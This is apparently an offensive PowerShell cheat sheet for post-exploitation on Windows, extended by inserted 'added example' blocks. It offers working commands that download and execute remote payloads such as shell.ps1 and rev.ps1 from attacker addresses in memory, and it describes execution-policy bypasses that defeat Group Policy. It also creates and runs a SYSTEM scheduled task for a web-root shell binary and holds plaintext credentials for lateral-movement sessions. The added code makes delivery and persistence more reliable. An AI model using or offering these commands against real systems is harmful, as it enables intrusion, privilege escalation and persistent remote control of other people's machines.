Powershell

Windows PowerShell Default Path Location

Tip: If running `powershell` does not work, it is worth trying to call it by its full path. Note that on 64-bit Windows, a 32-bit process (for example a 32-bit web shell or injected payload) has `System32` silently redirected to `SysWOW64`; from such a process, `C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe` reaches the real 64-bit binary.

 For 64 bits C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 For 32 bits C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
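The following is an added example, not code from the original page: a small function that returns the correct `powershell.exe` path no matter which bitness the calling process has, so the two paths above are picked automatically and the WoW64 redirection case is handled instead of silently landing in the wrong directory.

```powershell
# Added example (not from the original page): choose the right powershell.exe path
# from an arbitrary calling process, accounting for WoW64 file-system redirection.
function Get-PowerShellPath {
    param([switch]$Want32Bit)
    $sysRoot = $env:SystemRoot                        # usually C:\Windows
    $tail    = 'WindowsPowerShell\v1.0\powershell.exe'

    if (-not [Environment]::Is64BitOperatingSystem) {
        # 32-bit OS: only one copy exists
        return Join-Path $sysRoot "System32\$tail"
    }
    if ($Want32Bit) {
        # SysWOW64 is visible from both 32-bit and 64-bit processes
        return Join-Path $sysRoot "SysWOW64\$tail"
    }
    if ([Environment]::Is64BitProcess) {
        return Join-Path $sysRoot "System32\$tail"
    }
    # From a 32-bit process, System32 is redirected to SysWOW64; the Sysnative
    # virtual directory (only visible to 32-bit processes) reaches the real 64-bit System32
    return Join-Path $sysRoot "Sysnative\$tail"
}

# Usage: spawn the 64-bit PowerShell and confirm the bitness of the child
& (Get-PowerShellPath) -NoProfile -Command '[Environment]::Is64BitProcess'
```

`Sysnative` is not a real directory on disk; it is only resolved by the file-system redirector for 32-bit processes, which is why the function only returns it in that case.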

Variations for invoking PowerShell through an RCE

If none of the variations below work, PowerShell is probably not usable on the target system (for example removed, blocked by AppLocker/WDAC, or the RCE runs in a context where PATH is not set).

powershell <command>
powershell.exe <command>
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <command> #use the full path
cmd.exe /c powershell <command>
cmd.exe /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <command>

In a Powershell session

Download a file

(New-Object System.Net.WebClient).DownloadFile('http://192.168.119.190:5555/adduser.exe','adduser.exe')

Download and execute without writing on the disk

IEX (New-Object System.Net.WebClient).DownloadString('http://10.11.0.4/helloworld.ps1')
IEX (IWR http://10.10.10.6/rev.ps1 -UseBasicParsing)

Download a file with Invoke Web Request

Invoke-WebRequest http://10.10.14.2:80/taskkill.exe -OutFile 'taskkill.exe'

# Alias iwr is also accepted
iwr http://10.10.14.2:80/taskkill.exe -OutFile 'taskkill.exe' 
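The download one-liners above are fine for a quick transfer, but two things bite in practice: `WebClient.DownloadFile` resolves a relative output path against the process working directory (not the PowerShell `$PWD` you changed into with `cd`), and there is no check that the file that arrived is the one you served. The block below is an added example, not code from the original page; it wraps both the to-disk and the in-memory variants with a WebClient to Invoke-WebRequest fallback, an absolute output path, and an optional SHA256 check. The URLs, file names and hash are assumptions.

```powershell
# Added example (not from the original page). Assumed: a listener at
# http://192.168.119.190:5555 serves adduser.exe and you know its SHA256.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12  # needed for HTTPS on older hosts

function Get-RemoteFile {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$OutFile,
        [string]$ExpectedSha256                 # optional integrity check
    )
    # WebClient uses the .NET current directory, which can differ from $PWD; make the path absolute
    if (-not [IO.Path]::IsPathRooted($OutFile)) {
        $OutFile = Join-Path (Get-Location).ProviderPath $OutFile
    }
    try {
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($Url, $OutFile)
    } catch {
        # Some hosts fail on WebClient (proxy, TLS) but still work with Invoke-WebRequest
        Invoke-WebRequest -Uri $Url -OutFile $OutFile -UseBasicParsing
    }
    if ($ExpectedSha256) {
        $actual = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
        if ($actual -ne $ExpectedSha256.ToUpper()) {
            Remove-Item $OutFile -Force
            throw "Hash mismatch for $OutFile : got $actual"
        }
    }
    Get-Item $OutFile
}

function Get-RemoteScriptText {
    # Fetch script text for an in-memory IEX cradle, with the same fallback; nothing touches disk
    param([Parameter(Mandatory)][string]$Url)
    try {
        (New-Object System.Net.WebClient).DownloadString($Url)
    } catch {
        (Invoke-WebRequest -Uri $Url -UseBasicParsing).Content
    }
}

# Usage (hash value is a placeholder assumption)
Get-RemoteFile -Url 'http://192.168.119.190:5555/adduser.exe' -OutFile 'adduser.exe' `
    -ExpectedSha256 'E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855'
IEX (Get-RemoteScriptText 'http://10.11.0.4/helloworld.ps1')
```

Keeping `IEX` at the call site rather than inside the helper matters: functions defined by the downloaded script land in whichever scope runs `Invoke-Expression`, so running it inside a helper function would leave them invisible to the rest of the session.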

Download and execute - Outside of a Powershell session

cmd.exe /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')

Set Execution Policy

Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
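Changing the persisted policy is rarely necessary and leaves a trace in the registry. The execution policy is not a security boundary: it only gates running script files, and it can be overridden per process or sidestepped entirely by feeding the script text to `Invoke-Expression`. The one thing that does block you is a policy set by Group Policy (the `MachinePolicy` or `UserPolicy` scopes), which overrides both `Set-ExecutionPolicy` and the `-ExecutionPolicy` command-line switch. The block below is an added example, not from the original page; the script path `C:\Temp\tool.ps1` is an assumption.

```powershell
# Added example (not from the original page). Assumed script: C:\Temp\tool.ps1

# See which scope is actually winning; a GPO-set MachinePolicy/UserPolicy overrides the rest
Get-ExecutionPolicy -List

# Option 1: one-off, per-process, nothing persisted (ineffective if GPO sets the policy)
powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Temp\tool.ps1

# Option 2: change only the current process (also ineffective against GPO)
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force

# Option 3: the policy only applies to script files, so in-memory code is never checked.
# This works even when the policy is enforced by GPO.
IEX (Get-Content -Raw -Path C:\Temp\tool.ps1)

# A file downloaded by a browser carries a Zone.Identifier stream that makes RemoteSigned
# refuse it even when local scripts are allowed; removing the mark is enough
Unblock-File -Path C:\Temp\tool.ps1
```

Option 3 is the one to reach for when `Get-ExecutionPolicy -List` shows a value under `MachinePolicy` or `UserPolicy`; the other two will print an error or be silently overridden.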

Show environment variables

dir env:

# Alternative to whoami. Note: $env:USERNAME is only the account name, whereas whoami prints DOMAIN\user;
# use "$env:USERDOMAIN\$env:USERNAME" to get both
echo $env:USERNAME

Create a PSCredential object

Use alternate credentials with any cmdlet or function that accepts a -Credential parameter (Get-DomainUser below is from PowerView, not a built-in cmdlet).

# use alternate credentials for any function that takes -Credential
$password = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)
Get-DomainUser -Credential $Cred

Create a scheduled task as an elevated user

The command below creates a scheduled task named shell that executes the shell_admin.exe binary located at C:\inetpub\wwwroot\shell_admin.exe with SYSTEM privileges. Creating a task with /ru SYSTEM requires local administrator rights on the target, so -Credential is used to run the command as a privileged account; Invoke-Command also requires WinRM access to the host. Because the schedule is /sc onstart, the task only fires at boot unless it is triggered manually (next section).

Invoke-Command -ComputerName hutchdc -ScriptBlock { schtasks /create /sc onstart /tn shell /tr C:\inetpub\wwwroot\shell_admin.exe /ru SYSTEM } -Credential $Cred

Run the scheduled task as an elevated user

Invoke-Command -ComputerName hutchdc -ScriptBlock { schtasks /run /tn shell } -Credential $Cred
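The three steps above (build the credential, create the task, run it) as one complete procedure, with the checks you want in between: that the binary actually exists on the remote host, that `schtasks` returned success, what the task is configured to run as, and the result after triggering it. This is an added example, not code from the original page; the host name, credentials, binary path and task name are the page's values and are assumptions about the target.

```powershell
# Added example (not from the original page). Assumed: hutchdc accepts WinRM,
# $Cred is a local admin on it, and C:\inetpub\wwwroot\shell_admin.exe already exists there.
$password = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)

function Invoke-SystemTask {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][pscredential]$Credential,
        [Parameter(Mandatory)][string]$BinaryPath,
        [string]$TaskName = 'shell',
        [switch]$Cleanup                       # delete the task afterwards so it does not persist
    )
    Invoke-Command -ComputerName $ComputerName -Credential $Credential `
        -ArgumentList $TaskName, $BinaryPath, [bool]$Cleanup -ScriptBlock {
        param($TaskName, $BinaryPath, $Cleanup)

        if (-not (Test-Path -Path $BinaryPath)) {
            throw "$BinaryPath not found on $env:COMPUTERNAME"
        }

        # /ru SYSTEM needs local admin; /f overwrites a stale task with the same name
        schtasks /create /sc onstart /tn $TaskName /tr $BinaryPath /ru SYSTEM /f | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "schtasks /create failed with exit code $LASTEXITCODE" }

        # Confirm what was registered and who it runs as before triggering it
        schtasks /query /tn $TaskName /v /fo LIST | Select-String 'Task To Run|Run As User'

        # onstart only fires at boot; /run triggers it now
        schtasks /run /tn $TaskName | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "schtasks /run failed with exit code $LASTEXITCODE" }

        Start-Sleep -Seconds 2
        schtasks /query /tn $TaskName /v /fo LIST | Select-String 'Status|Last Result'

        if ($Cleanup) { schtasks /delete /tn $TaskName /f | Out-Null }
    }
}

Invoke-SystemTask -ComputerName hutchdc -Credential $Cred -BinaryPath 'C:\inetpub\wwwroot\shell_admin.exe'
```

`Last Result` of 0 means the binary exited cleanly; a reverse shell that is still running shows `Status: Running` instead, which is the expected outcome here. Use `-Cleanup` only when the payload no longer needs the task to exist (for example once it has re-established its own persistence), since deleting it while the process runs does not kill the process.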

Create a Remote PowerShell session as an alternate user

PS > $password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
PS > $cred = new-object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)
PS > Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred
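`Enter-PSSession` gives an interactive prompt, but for repeated commands a persistent session created with `New-PSSession` is more useful: it keeps variables and loaded modules between calls, lets you copy files through it without a web server, and can be entered and left repeatedly. The block below is an added example, not code from the original page; it reuses the page's host and account and assumes that host accepts WinRM from where you are.

```powershell
# Added example (not from the original page). Assumed: ACADEMY-EA-DB01 accepts WinRM
# (5985/5986) from this host and INLANEFREIGHT\forend is allowed to connect.
$password = ConvertTo-SecureString "Klmcargo2" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("INLANEFREIGHT\forend", $password)

# Probe the listener first: a failure here is a transport or firewall problem, not a bad password
Test-WSMan -ComputerName ACADEMY-EA-DB01 -ErrorAction Stop | Out-Null

# Persistent session: state survives between Invoke-Command calls
$s = New-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred
Invoke-Command -Session $s -ScriptBlock { whoami; $env:COMPUTERNAME; $PSVersionTable.PSVersion }

# Push a tool through the session (PowerShell 5.0+) instead of standing up an HTTP server
Copy-Item -Path .\taskkill.exe -Destination 'C:\Windows\Temp\taskkill.exe' -ToSession $s

# Drop in interactively when needed; typing exit at the remote prompt returns here
# without closing $s, so the session can be re-entered later
Enter-PSSession -Session $s

# Tear down when finished
Remove-PSSession -Session $s
```

One caveat worth knowing before relying on this: by default the credentials do not flow a second hop. Commands run on ACADEMY-EA-DB01 that reach out to another host (a file share, a domain controller) will authenticate as anonymous unless CredSSP or Kerberos delegation is configured, so anything that needs network access from the remote side should be run with explicit credentials there.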
